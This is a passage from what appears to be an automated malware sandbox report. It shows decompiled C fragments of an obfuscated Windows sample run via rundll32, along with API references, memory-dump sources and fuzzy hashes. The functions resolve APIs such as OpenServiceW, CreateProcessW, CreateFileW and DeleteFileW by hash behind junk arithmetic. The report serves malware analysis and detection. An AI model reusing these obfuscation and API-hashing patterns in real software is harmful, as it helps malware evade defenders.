				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001d5fb5
0x001d5fb6
0x001d5fb7
0x001d5fbb
0x001d5fbc
0x001d5fc1
0x001d5fcb
0x001d5fd7
0x001d5fde
0x001d5fe5
0x001d5ffc
0x001d5fff
0x001d6006
0x001d600d
0x001d601a
0x001d6025
0x001d602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025

Memory Dump Source

Source File: 00000009.00000002.2113574384.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000009.00000002.2113568193.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2113613725.00000000001EC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2700 Parent PID: 2868 rundll32.exeCOMMON

Executed Functions

Function 007E2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E007E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E007E602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E007F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x007e295f
0x007e2964
0x007e2967
0x007e296a
0x007e296d
0x007e296e
0x007e296f
0x007e2977
0x007e2985
0x007e298a
0x007e2992
0x007e299a
0x007e29a2
0x007e29a9
0x007e29b0
0x007e29b7
0x007e29bb
0x007e29cf
0x007e29dc
0x007e29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 007E29DC

Strings

<^, xrefs: 007E2977

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: ecb02cfdb821036a11feca7c982d830a98ec42001a86dbb5f982b5d0ab0e83a4
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: AF018072A01108BFEB14DF95DC0A8DFBFB6EF48350F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 007EC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E007EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E007E602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E007F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x007ec6e1
0x007ec6e6
0x007ec6f0
0x007ec6fc
0x007ec703
0x007ec706
0x007ec70d
0x007ec711
0x007ec715
0x007ec71c
0x007ec723
0x007ec72a
0x007ec731
0x007ec738
0x007ec751
0x007ec762
0x007ec768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 007EC762

Strings

/O, xrefs: 007EC6E6

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 51cf63270e4029c5eb1544d0031127c532496e038412d53fd50337e5a4f40a6e
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: EC1122B290122DBBCB259F95DC498EFBEB9EF04754F108188B90962220D3714A659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 007E1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E007E1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E007E602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E007F07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x007e1006
0x007e1009
0x007e100c
0x007e1011
0x007e1016
0x007e101d
0x007e1026
0x007e102d
0x007e1034
0x007e103b
0x007e1047
0x007e104f
0x007e1057
0x007e105e
0x007e1065
0x007e106c
0x007e1073
0x007e1077
0x007e108b
0x007e1096
0x007e109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 007E1096

Strings

[, xrefs: 007E103B

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 9e8ae1b7d8eb851009ad1ca5ec0688c9f13e3013faa2b19ae3d0cf30ce62d8c3
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: AD016DB6D0130CFBDF04DF94C94A9DEBBB1EF54318F108188E51466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 007E4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007E4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E007F07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x007e485e
0x007e487a
0x007e487d
0x007e4884
0x007e488b
0x007e4892
0x007e489d
0x007e48a0
0x007e48ad
0x007e48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 007E48B7

Strings

[, xrefs: 007E488B

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 11b9670f1e35f49eeedadafc792b36e6e50d71a2a88ea080fde8c27310a7fe19
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 6FF0F4B0A05209FBDB04CFA8CA5699EBFB9AB40301F208188E444A7290E2B15F509A50

Uniqueness

Uniqueness Score: -1.00%

Function 007F4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E007F4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E007E602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E007F07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x007f4f80
0x007f4f81
0x007f4f82
0x007f4f86
0x007f4f87
0x007f4f8c
0x007f4fa5
0x007f4fa8
0x007f4faf
0x007f4fb6
0x007f4fc7
0x007f4fca
0x007f4fd7
0x007f4fe2
0x007f4fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 007F4FE2

Strings

{#lm, xrefs: 007F4FC2

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 298e4f2687c62778a50a6e0e97172ce1b69ee4c27aeb48e2a9bdb462d7fcf3e5
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: E3F037B081120CFFDF04EFA4D94689EBFBAEB44340F208199E804AB261D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 007F976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E007F976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007E602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E007F07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x007f9772
0x007f9773
0x007f9778
0x007f977a
0x007f977b
0x007f977e
0x007f977f
0x007f9782
0x007f9785
0x007f9788
0x007f9789
0x007f978c
0x007f978f
0x007f9790
0x007f9791
0x007f9794
0x007f9797
0x007f979a
0x007f979d
0x007f97a0
0x007f97a3
0x007f97a6
0x007f97a7
0x007f97a8
0x007f97ad
0x007f97b7
0x007f97c3
0x007f97ca
0x007f97d1
0x007f97d8
0x007f97df
0x007f97e3
0x007f97fc
0x007f9816
0x007f981d

APIs

CreateProcessW.KERNEL32(007E591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,007E591A), ref: 007F9816

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: a907c26b4ec8b69e06a8087a7715632b8514ba6b0e5c83632eb370c704d08f4f
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 5911B372901188FBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007EB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E007EB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E007E602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E007F07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x007eb569
0x007eb56a
0x007eb56d
0x007eb572
0x007eb574
0x007eb577
0x007eb57a
0x007eb57d
0x007eb580
0x007eb583
0x007eb586
0x007eb587
0x007eb58a
0x007eb58d
0x007eb590
0x007eb593
0x007eb594
0x007eb595
0x007eb59a
0x007eb5a4
0x007eb5b8
0x007eb5c0
0x007eb5c4
0x007eb5cb
0x007eb5d2
0x007eb5d9
0x007eb5e6
0x007eb5fd
0x007eb604

APIs

CreateFileW.KERNELBASE(007F0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,007F0668,?,?,?,?), ref: 007EB5FD

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: badd2a08d3a67d374fc4a33f89244e3d164d4c49ab995ce6c87f200096f69c87
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 9511B472801148FBDF16DF95DD06CEE7F7AEF89314F144198FA1462120D3769A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 007F981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E007F981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007E602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E007F07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x007f9821
0x007f9822
0x007f9825
0x007f9828
0x007f982a
0x007f982c
0x007f982f
0x007f9832
0x007f9835
0x007f9836
0x007f9837
0x007f983c
0x007f9855
0x007f9858
0x007f985f
0x007f9866
0x007f986d
0x007f9874
0x007f987b
0x007f988e
0x007f989b
0x007f98a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,007E87F2,0000CAAE,0000510C,AD82F196), ref: 007F989B

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 644357010f319615db96569d1b3a95f9ce8556cd531e4cedd373715a129af69d
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 6B019A72801208FBDF04EFD5D84ACDFBF79EF85350F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 007F7BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E007F7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007E602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E007F07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x007f7bf7
0x007f7bf8
0x007f7bfa
0x007f7bfd
0x007f7bff
0x007f7c02
0x007f7c06
0x007f7c07
0x007f7c0f
0x007f7c1d
0x007f7c25
0x007f7c2d
0x007f7c31
0x007f7c38
0x007f7c3f
0x007f7c46
0x007f7c4a
0x007f7c5e
0x007f7c67
0x007f7c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 007F7C67

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 80d7658eed1c86d343665c2724d32ac754fe9f66f28a766671c51cb1b839932a
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 15014FB190120CFFEB09DF94C84E8DE7BB9EF44314F108198F505A7250E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 007EF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E007EF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007E602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E007F07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x007ef662
0x007ef663
0x007ef665
0x007ef668
0x007ef66a
0x007ef66d
0x007ef670
0x007ef673
0x007ef677
0x007ef678
0x007ef67d
0x007ef687
0x007ef693
0x007ef69a
0x007ef6a1
0x007ef6a5
0x007ef6a9
0x007ef6b0
0x007ef6c9
0x007ef6d8
0x007ef6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 007EF6D8

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 57d2d88f6a4e026f78e540ec4987675ac265ce2e3096875982d998d7c94258fe
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: A901E5B690120CBBEF05AF94DC0A8DF7F79EB05364F148188F90462251D6B65E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 007EB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E007EB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E007E602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E007F07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x007eb6f3
0x007eb6f8
0x007eb702
0x007eb70b
0x007eb712
0x007eb719
0x007eb720
0x007eb727
0x007eb72e
0x007eb747
0x007eb759
0x007eb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 007EB759

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 30f380bca19fdbecd948fa461c1a7f2c1f60f8f3cb8401fccb58471bb026978e
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 42014FB594130CFBEF45DF94DD06E9E7BB5EF18704F108188FA05661A1D3B15E209B61

Uniqueness

Uniqueness Score: -1.00%

Function 007FAA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E007FAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007E602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E007F07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x007faa3f
0x007faa40
0x007faa41
0x007faa44
0x007faa47
0x007faa4b
0x007faa4c
0x007faa51
0x007faa5b
0x007faa64
0x007faa68
0x007faa6f
0x007faa76
0x007faa8d
0x007faa90
0x007faa9d
0x007faaa8
0x007faaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 007FAAA8

Memory Dump Source

Source File: 0000000A.00000002.2115944509.00000000007E1000.00000020.00000001.sdmp, Offset: 007E0000, based on PE: true

Associated: 0000000A.00000002.2115937134.00000000007E0000.00000004.00000001.sdmp Download File
Associated: 0000000A.00000002.2115984048.00000000007FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 9954163dcc7f5528be3b0273de54058bbbbcf90b9abdde67fede066e56ecbbbf
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: D2F069B190020CFFDF08EF94DD4A89EBFB9EB44304F108088F905A6261D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

